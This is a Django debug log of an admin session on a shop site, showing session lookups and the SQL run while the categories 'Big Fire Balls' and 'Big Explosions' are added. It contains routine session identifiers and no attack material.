"_django_curs_139831317362432_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 12:28:25,983 utils 11259 139831317362432 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T12:28:25.981639+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 12, 28, 25, 981639, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 12:28:25] "GET /shop/category/10/change/ HTTP/1.0" 200 8032 DEBUG 2019-12-13 12:28:26,288 utils 11259 139831317362432 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T12:28:26.277218+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 12, 28, 26, 277218, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 12:28:26,292 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [13/Dec/2019 12:28:26] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-13 12:28:31,660 utils 11259 139831317362432 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T12:28:31.644964+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 12, 28, 31, 644964, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 12:28:31,663 utils 11259 139831317362432 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 12:28:31,668 utils 11259 139831317362432 (0.002) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-13 12:28:31,669 utils 11259 139831317362432 (0.000) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-13 12:28:31,677 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC, "shop_category"."id" DESC; args=() DEBUG 2019-12-13 12:28:31,840 utils 11259 139831317362432 (0.002) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T12:28:31.837684+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 12, 28, 31, 837684, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 12:28:31] "GET /shop/category/ HTTP/1.0" 200 6758 DEBUG 2019-12-13 12:28:32,137 utils 11259 139831317362432 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T12:28:32.122694+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 12, 28, 32, 122694, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 12:28:32,141 utils 11259 139831317362432 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [13/Dec/2019 12:28:32] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-13 12:28:33,618 utils 11259 139831317362432 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T12:28:33.604422+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 12, 28, 33, 604422, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 12:28:33,622 utils 11259 139831317362432 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 12:28:33,697 utils 11259 139831317362432 (0.003) DECLARE "_django_curs_139831317362432_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 12:28:33,759 utils 11259 139831317362432 (0.002) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T12:28:33.756308+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 12, 28, 33, 756308, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 12:28:33] "GET /shop/category/add/ HTTP/1.0" 200 7467 DEBUG 2019-12-13 12:28:34,059 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T12:28:34.050228+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 12, 28, 34, 50228, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 12:28:34,061 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [13/Dec/2019 12:28:34] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-13 12:28:58,728 utils 11259 139831317362432 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T12:28:58.715231+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 12, 28, 58, 715231, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 12:28:58,732 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 12:28:58,805 utils 11259 139831317362432 (0.003) DECLARE "_django_curs_139831317362432_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 12:28:58,866 utils 11259 139831317362432 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T12:28:58.863503+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 12, 28, 58, 863503, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 12:28:58] "GET /shop/category/add/ HTTP/1.0" 200 7467 DEBUG 2019-12-13 12:28:59,211 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T12:28:59.202814+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 12, 28, 59, 202814, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 12:28:59,213 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [13/Dec/2019 12:28:59] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-13 12:29:40,998 utils 11259 139831317362432 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T12:29:40.982314+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 12, 29, 40, 982314, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 12:29:41,002 utils 11259 139831317362432 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 12:29:41,012 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 6; args=(6,) DEBUG 2019-12-13 12:29:41,158 utils 11259 139831317362432 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."id" = 6 LIMIT 1; args=(6,) DEBUG 2019-12-13 12:29:41,161 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE ("shop_category"."parent_id" = 6 AND "shop_category"."slug" = 'big-fire-balls') LIMIT 1; args=(6, 'big-fire-balls') DEBUG 2019-12-13 12:29:41,162 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."name" = 'Big Fire Balls' LIMIT 1; args=('Big Fire Balls',) DEBUG 2019-12-13 12:29:41,164 utils 11259 139831317362432 (0.001) SELECT "shop_category"."lft", "shop_category"."rght", "shop_category"."level", "shop_category"."tree_id" FROM "shop_category" WHERE "shop_category"."id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC LIMIT 1; args=(6,) DEBUG 2019-12-13 12:29:41,167 utils 11259 139831317362432 (0.002) UPDATE "shop_category" SET "lft" = CASE WHEN "lft" > 1 THEN "lft" + 2 ELSE "lft" END, "rght" = CASE WHEN "rght" > 1 THEN "rght" + 2 ELSE "rght" END WHERE "tree_id" = 2 AND ("lft" > 1 OR "rght" > 1); args=[1, 2, 1, 2, 2, 1, 1] DEBUG 2019-12-13 12:29:41,174 utils 11259 139831317362432 (0.003) INSERT INTO "shop_category" ("name", "parent_id", "image", "description", "popular", "slug", "lft", "rght", "tree_id", "level") VALUES ('Big Fire Balls', 6, 'categories/2019/12/13/collection3.png', 'Big Fire Balls', false, 'big-fire-balls', 2, 3, 2, 1) RETURNING "shop_category"."id"; args=('Big Fire Balls', 6, 'categories/2019/12/13/collection3.png', 'Big Fire Balls', False, 'big-fire-balls', 2, 3, 2, 1) DEBUG 2019-12-13 12:29:41,176 utils 11259 139831317362432 (0.001) INSERT INTO "django_admin_log" ("action_time", "user_id", "content_type_id", "object_id", "object_repr", "action_flag", "change_message") VALUES ('2019-12-13T12:29:41.174750+00:00'::timestamptz, 6, 8, '12', 'Big Fire Balls', 1, '[{"added": {}}]') RETURNING "django_admin_log"."id"; args=(datetime.datetime(2019, 12, 13, 12, 29, 41, 174750, tzinfo=), 6, 8, '12', 'Big Fire Balls', 1, '[{"added": {}}]') [13/Dec/2019 12:29:41] "POST /shop/category/add/ HTTP/1.0" 302 0 DEBUG 2019-12-13 12:29:41,443 utils 11259 139831317362432 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T12:29:41.430659+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 12, 29, 41, 430659, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 12:29:41,448 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 12:29:41,513 utils 11259 139831317362432 (0.002) DECLARE "_django_curs_139831317362432_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 12:29:41,580 utils 11259 139831317362432 (0.002) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T12:29:41.577161+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 12, 29, 41, 577161, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 12:29:41] "GET /shop/category/add/ HTTP/1.0" 200 7738 DEBUG 2019-12-13 12:29:41,877 utils 11259 139831317362432 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T12:29:41.862828+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 12, 29, 41, 862828, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 12:29:41,881 utils 11259 139831317362432 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [13/Dec/2019 12:29:41] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-13 12:30:23,323 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T12:30:23.313872+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 12, 30, 23, 313872, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 12:30:23,325 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 12:30:23,331 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 6; args=(6,) DEBUG 2019-12-13 12:30:23,335 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."id" = 6 LIMIT 1; args=(6,) DEBUG 2019-12-13 12:30:23,337 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE ("shop_category"."parent_id" = 6 AND "shop_category"."slug" = 'big-explosions') LIMIT 1; args=(6, 'big-explosions') DEBUG 2019-12-13 12:30:23,338 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."name" = 'Big Explosions' LIMIT 1; args=('Big Explosions',) DEBUG 2019-12-13 12:30:23,341 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE ("shop_category"."name" > 'Big Explosions' AND "shop_category"."parent_id" = 6) ORDER BY "shop_category"."name" ASC, "shop_category"."lft" ASC LIMIT 1; args=('Big Explosions', 6) DEBUG 2019-12-13 12:30:23,343 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 6; args=(6,) DEBUG 2019-12-13 12:30:23,344 utils 11259 139831317362432 (0.001) UPDATE "shop_category" SET "lft" = CASE WHEN "lft" > 1 THEN "lft" + 2 ELSE "lft" END, "rght" = CASE WHEN "rght" > 1 THEN "rght" + 2 ELSE "rght" END WHERE "tree_id" = 2 AND ("lft" > 1 OR "rght" > 1); args=[1, 2, 1, 2, 2, 1, 1] DEBUG 2019-12-13 12:30:23,347 utils 11259 139831317362432 (0.001) INSERT INTO "shop_category" ("name", "parent_id", "image", "description", "popular", "slug", "lft", "rght", "tree_id", "level") VALUES ('Big Explosions', 6, 'categories/2019/12/13/collection6.png', 'Big Explosions', false, 'big-explosions', 2, 3, 2, 1) RETURNING "shop_category"."id"; args=('Big Explosions', 6, 'categories/2019/12/13/collection6.png', 'Big Explosions', False, 'big-explosions', 2, 3, 2, 1) DEBUG 2019-12-13 12:30:23,349 utils 11259 139831317362432 (0.001) INSERT INTO "django_admin_log" ("action_time", "user_id", "content_type_id", "object_id", "object_repr", "action_flag", "change_message") VALUES ('2019-12-13T12:30:23.348080+00:00'::timestamptz, 6, 8, '13', 'Big Explosions', 1, '[{"added": {}}]') RETURNING "django_admin_log"."id"; args=(datetime.datetime(2019, 12, 13, 12, 30, 23, 348080, tzinfo=), 6, 8, '13', 'Big Explosions', 1, '[{"added": {}}]') [13/Dec/2019 12:30:23] "POST /shop/category/add/ HTTP/1.0" 302 0 DEBUG 2019-12-13 12:30:23,610 utils 11259 139831317362432 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T12:30:23.597687+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 12, 30, 23, 597687, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 12:30:23,613 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 12:30:23,667 utils 11259 139831317362432 (0.002) DECLARE "_django_curs_139831317362432_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 12:30:23,714 utils 11259 139831317362432 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T12:30:23.711792+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 12, 30, 23, 711792, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 12:30:23] "GET /shop/category/add/ HTTP/1.0" 200 7788 DEBUG 2019-12-13 12:30:24,009 utils 11259 139831317362432 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T12:30:23.998931+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 12, 30, 23, 998931, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 12:30:24,011 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [13/Dec/2019 12:30:24] "GET /jsi18n/ HTTP/1.0" 200 3223 [13/Dec/2019 12:30:40] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-13 12:31:04,033 utils 11259 139831317362432 